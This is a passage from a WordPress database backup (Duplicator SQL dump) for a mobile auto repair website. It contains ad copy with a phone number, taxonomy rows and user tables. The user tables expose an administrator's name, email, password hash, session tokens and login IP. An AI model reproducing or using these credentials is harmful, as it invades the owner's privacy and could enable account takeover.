style=\"font-family: Georgia; color: black;\">Especially when compared to waiting around all day, for your vehicle just to come inline to be look at for service.</span></span></h3>\r\n<h3 style=\"orphans: auto; text-align: start; widows: auto; -webkit-text-stroke-width: 0px; word-spacing: 0px;\"><span style=\"color: #000000;\"><span style=\"font-family: Georgia; color: black;\">Being able to do whatever you like at home or office while the dedicated mechanic performs the service task at hand, rather than having to wait at an auto repair service department is a great advantage &amp; gain for you!</span></span></h3>\r\n<h3></h3>\r\n<h3>With a mobile mechanic you are able to speak directly to the mechanics, about how to carry out any repair issues without delay; likewise, being able to meet at your place of business or at home.</h3>\r\n<h2><span style=\"color: #ff0000;\">Make an appointment for your <span style=\"text-decoration: underline;\">auto repairs</span> today!</span></h2>\r\n<h1>CALL US NOW:  <span class=\"number\" style=\"color: #333300;\"> (813) 361-1384</span></h1>\r\n&nbsp;\r\n<h1 style=\"text-align: center;\">How It Works!</h1>\r\n<h2><span style=\"color: #ff0000;\">Requesting auto repairs is easy with The Mobile Mechanics.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">If you know what the issue is we can help you with the purchase of the parts and give you a general estimate over the phone to what the cost should be.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">If you do not know what the problem is then we can come over to where your vehicle is and perform a computer diagnostic service to trouble shoot and find the problems.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">Our at home, office and roadside diagnostic service calls are around $75 which covers the time &amp; expenses to come out to diagnose your vehicle’s problems, and if we do the repair job at that same time then the diagnostics can be free “only charging for the first hour of labor” to fix the issues.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">All work guaranteed! All you\'ve have to do is call or fill out the inquiry form on this website now.</span></h2>\r\n<h1></h1>\r\n<h3><strong>Broken Down Car Truck o<img class=\"alignleft wp-image-54 size-full\" title=\"Miami Florida The Mobile Mechanic \" src=\"http://www.miamifl.themobilemechanics.org/wp-content/uploads/2014/03/Miami-FL-Mobile-Mechanics.jpg\" alt=\"Miami FL Mobile Mechanics\" width=\"150\" height=\"150\" /></strong>r Van?</h3>\r\n<h2 style=\"text-align: center;\">Why Not Have The Auto Mechanics</h2>\r\n<h2 style=\"text-align: center;\">come to you!</h2>\r\n<h3 style=\"text-align: center;\">The Traveling “Auto Care Mechanic\" For <em>Car Maintenance</em> and <em>Auto Repair</em>.</h3>\r\n<h4>Hi ho hi-ho, you hopped into your car and it just won\'t go, and suddenly you think you need a tow!</h4>\r\n<h4>To get back on the road again “you may-not-need to call around for towing services, and auto shops “</h4>\r\n<h4>There is a new &amp; better way “just call your neighborhood mobile mechanic”.</h4>\r\n<h4></h4>\r\n<h3><iframe src=\"//www.youtube.com/embed/LjFLoOo-ViM?rel=0\" width=\"560\" height=\"315\" frameborder=\"0\"></iframe></h3>\r\n&nbsp;\r\n<h2><em>Talk to a mechanic now: </em></h2>\r\n<h1><span class=\"number\" style=\"color: #333300;\">(813) 361-1384</span>\r\n<img class=\"alignright size-full wp-image-38\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mobile-Mechanic.jpg\" alt=\"Mobile-Mechanic\" width=\"150\" height=\"150\" /></h1>\r\n<img class=\"alignleft size-full wp-image-48\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mechanic-auto-repair.jpg\" alt=\"Mechanic-auto-repair\" width=\"300\" height=\"210\" />", "Auto Repair Service", "", "inherit", "closed", "closed", "", "14-revision-v1", "", "", "2015-02-07 22:02:09", "2015-02-08 03:02:09", "", "14", "http://tallahassee.themobilemechanics.org/14-revision-v1/", "0", "revision", "", "0");

/* INSERT TABLE DATA: wp_term_relationships */
INSERT INTO `wp_term_relationships` VALUES("14", "2", "0");
INSERT INTO `wp_term_relationships` VALUES("14", "3", "0");
INSERT INTO `wp_term_relationships` VALUES("25", "2", "0");
INSERT INTO `wp_term_relationships` VALUES("25", "4", "0");
INSERT INTO `wp_term_relationships` VALUES("27", "2", "0");
INSERT INTO `wp_term_relationships` VALUES("27", "3", "0");
INSERT INTO `wp_term_relationships` VALUES("70", "2", "0");
INSERT INTO `wp_term_relationships` VALUES("70", "5", "0");
INSERT INTO `wp_term_relationships` VALUES("84", "6", "0");
INSERT INTO `wp_term_relationships` VALUES("85", "6", "0");
INSERT INTO `wp_term_relationships` VALUES("86", "6", "0");
INSERT INTO `wp_term_relationships` VALUES("87", "6", "0");
INSERT INTO `wp_term_relationships` VALUES("88", "6", "0");

/* INSERT TABLE DATA: wp_term_taxonomy */
INSERT INTO `wp_term_taxonomy` VALUES("1", "1", "category", "", "0", "0");
INSERT INTO `wp_term_taxonomy` VALUES("2", "2", "category", "", "0", "4");
INSERT INTO `wp_term_taxonomy` VALUES("3", "3", "post_tag", "", "0", "2");
INSERT INTO `wp_term_taxonomy` VALUES("4", "4", "post_tag", "", "0", "1");
INSERT INTO `wp_term_taxonomy` VALUES("5", "5", "post_tag", "", "0", "1");
INSERT INTO `wp_term_taxonomy` VALUES("6", "6", "nav_menu", "", "0", "5");
INSERT INTO `wp_term_taxonomy` VALUES("7", "7", "nav_menu", "", "0", "0");

/* INSERT TABLE DATA: wp_terms */
INSERT INTO `wp_terms` VALUES("1", "Uncategorized", "uncategorized", "0");
INSERT INTO `wp_terms` VALUES("2", "auto repair mobile mechanics", "auto-repair-mobile-mechanics", "0");
INSERT INTO `wp_terms` VALUES("3", "Mobile Auto Repair", "mobile-auto-repair", "0");
INSERT INTO `wp_terms` VALUES("4", "The mobile mechanics", "the-mobile-mechanics", "0");
INSERT INTO `wp_terms` VALUES("5", "auto repairs", "auto-repairs", "0");
INSERT INTO `wp_terms` VALUES("6", "bottom", "bottom", "0");
INSERT INTO `wp_terms` VALUES("7", "Top", "top", "0");

/* INSERT TABLE DATA: wp_usermeta */
INSERT INTO `wp_usermeta` VALUES("1", "1", "nickname", "admin207");
INSERT INTO `wp_usermeta` VALUES("2", "1", "first_name", "Keith");
INSERT INTO `wp_usermeta` VALUES("3", "1", "last_name", "Rossignol");
INSERT INTO `wp_usermeta` VALUES("4", "1", "description", "");
INSERT INTO `wp_usermeta` VALUES("5", "1", "rich_editing", "true");
INSERT INTO `wp_usermeta` VALUES("6", "1", "comment_shortcuts", "false");
INSERT INTO `wp_usermeta` VALUES("7", "1", "admin_color", "fresh");
INSERT INTO `wp_usermeta` VALUES("8", "1", "use_ssl", "0");
INSERT INTO `wp_usermeta` VALUES("9", "1", "show_admin_bar_front", "true");
INSERT INTO `wp_usermeta` VALUES("10", "1", "wp_capabilities", "a:1:{s:13:\"administrator\";b:1;}");
INSERT INTO `wp_usermeta` VALUES("11", "1", "wp_user_level", "10");
INSERT INTO `wp_usermeta` VALUES("12", "1", "dismissed_wp_pointers", "wp350_media,wp360_revisions,wp360_locks,wp390_widgets,aioseop_menu_210,aioseop_menu_220,wp410_dfw,jwl_utmce_pointer,aioseop_welcome_220");
INSERT INTO `wp_usermeta` VALUES("13", "1", "show_welcome_panel", "1");
INSERT INTO `wp_usermeta` VALUES("15", "1", "wp_dashboard_quick_press_last_post_id", "13");
INSERT INTO `wp_usermeta` VALUES("19", "1", "session_tokens", "a:12:{s:64:\"7bf6460e1b3082ec164f315c5ba9d26fd63ae0c8edcfa07a1a6a1423bf3eaa6b\";a:4:{s:10:\"expiration\";i:1424176180;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:101:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36\";s:5:\"login\";i:1422966580;}s:64:\"2249cbc049c42818f10de3277a17d395012be59dff6872ef34c2fb45f655cdc4\";a:4:{s:10:\"expiration\";i:1423415623;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36\";s:5:\"login\";i:1423242823;}s:64:\"7325db973a780caed7181459f68ecec28218d12cb77b1bba20537136f598fca1\";a:4:{s:10:\"expiration\";i:1423449194;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36\";s:5:\"login\";i:1423276394;}s:64:\"6548f5afee189fcdff4aba699272b71d5b53153ca6bf07b5a2244aebe42686b6\";a:4:{s:10:\"expiration\";i:1423453791;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36\";s:5:\"login\";i:1423280991;}s:64:\"3c2ed89bde5e0c2e72d11e8c156fa131d86d7f4a1fbbe563aaecc6f13687d86a\";a:4:{s:10:\"expiration\";i:1423457151;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36\";s:5:\"login\";i:1423284351;}s:64:\"e2d5cdb8bf06982217aede1129d3a9d0c17adcaaa4238bf6d5132063f6b1faab\";a:4:{s:10:\"expiration\";i:1423458136;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36\";s:5:\"login\";i:1423285336;}s:64:\"53b005280c8c51f92b49d4f57a254cae802824748401b12756cf5703f2e4931b\";a:4:{s:10:\"expiration\";i:1423482399;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36\";s:5:\"login\";i:1423309599;}s:64:\"921a1b81185b624a4ff75790529e5052675e020d50de83661892a6f36d3dd2c7\";a:4:{s:10:\"expiration\";i:1423517238;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36\";s:5:\"login\";i:1423344438;}s:64:\"e7c69a3f79866c242d872a008769163349c9b805189283b1374386d94e4c438d\";a:4:{s:10:\"expiration\";i:1423533501;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36\";s:5:\"login\";i:1423360701;}s:64:\"2ef9859d36a0c8a9a17af8b5a6dab58a13764fdb7449ff06a6610be2ad84ed30\";a:4:{s:10:\"expiration\";i:1423537275;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36\";s:5:\"login\";i:1423364475;}s:64:\"c752706d9017a66957285cbe7d3a1f33b08c3fc5e3606f9f2e80756979cdea53\";a:4:{s:10:\"expiration\";i:1423541198;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36\";s:5:\"login\";i:1423368398;}s:64:\"ecbdc324187226add24d072327034f30bcf45558ac0ddfc9b2dca8ccd9f13e59\";a:4:{s:10:\"expiration\";i:1423584584;s:2:\"ip\";s:12:\"65.35.99.143\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36\";s:5:\"login\";i:1423411784;}}");
INSERT INTO `wp_usermeta` VALUES("20", "1", "wp_user-settings", "editor=tinymce&advImgDetails=show&libraryContent=browse&align=none&imgsize=full");
INSERT INTO `wp_usermeta` VALUES("21", "1", "wp_user-settings-time", "1422988692");
INSERT INTO `wp_usermeta` VALUES("22", "1", "switch_utmce_to_wpep", "true");
INSERT INTO `wp_usermeta` VALUES("23", "1", "managenav-menuscolumnshidden", "a:4:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";}");
INSERT INTO `wp_usermeta` VALUES("24", "1", "metaboxhidden_nav-menus", "a:3:{i:0;s:8:\"add-post\";i:1;s:15:\"add-testimonial\";i:2;s:12:\"add-post_tag\";}");
INSERT INTO `wp_usermeta` VALUES("25", "1", "closedpostboxes_post", "a:1:{i:0;s:23:\"onpageseo_post_settings\";}");
INSERT INTO `wp_usermeta` VALUES("26", "1", "metaboxhidden_post", "a:6:{i:0;s:11:\"postexcerpt\";i:1;s:13:\"trackbacksdiv\";i:2;s:10:\"postcustom\";i:3;s:16:\"commentstatusdiv\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";}");
INSERT INTO `wp_usermeta` VALUES("27", "1", "manageedit-postcolumnshidden", "a:8:{i:0;s:6:\"author\";i:1;s:10:\"categories\";i:2;s:4:\"tags\";i:3;s:8:\"comments\";i:4;s:0:\"\";i:5;s:0:\"\";i:6;s:0:\"\";i:7;s:0:\"\";}");

/* INSERT TABLE DATA: wp_users */
INSERT INTO `wp_users` VALUES("1", "admin207", "$P$BsLbT7r5ck546odwieEk3mS9PZeJ6c.", "admin207", "Keifersfl@aol.com", "", "0000-00-00 00:00:00", "", "0", "admin207");

SET FOREIGN_KEY_CHECKS = 1; 

/* Duplicator WordPress Timestamp: 2015-02-08 16:17:29*/
/* DUPLICATOR_MYSQLDUMP_EOF */
